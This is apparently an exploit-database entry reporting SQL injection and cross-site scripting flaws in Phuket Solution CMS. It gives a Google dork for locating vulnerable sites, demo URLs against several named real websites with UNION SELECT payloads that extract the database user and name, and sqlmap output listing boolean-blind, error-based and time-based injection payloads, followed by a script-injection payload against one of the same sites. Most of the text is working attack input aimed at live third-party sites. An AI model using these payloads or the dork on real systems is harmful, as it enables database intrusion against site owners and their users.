#Exploit Title: PHUKET SOLUTIONCMS SQL Injection and XSS Vulnerability
#Date: 2020-10-04
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: www.phuketsolution.com
#Google Dork:" Powered by Phuket Solution" or "Developed by Phuket Solution" or "Designed & Developed by Phuket Designer"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: https://www.phuketsolution.com/portfolio.html
SQL Injection
Demo: http://henryscollection.com/product.php?products=-748%27%20UNION%20SELECT%201,2,3,4,user(),database(),7--%20-
Demo: http://www.theattitudeclub.com/saturdayscondo/themeweb/news-detail.php?id=75 [SQL Injection Vulnerability]
Demo:https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2%27
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: property-types (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: property-types=1 AND 6120=6120&types=2
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: property-types=1 AND (SELECT 9297 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9297=9297,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&types=2
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: property-types=1 AND (SELECT 8964 FROM (SELECT(SLEEP(5)))pKeR)&types=2
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
################################################################################
Cross Site Scripting (XSS)
Demo: https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2&location=&prices=&bedroom=&code=%22%2F%3E%3Cscript%3Ealert%28%22PywebSecurity%22%29%3C%2Fscript%3E%3E
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************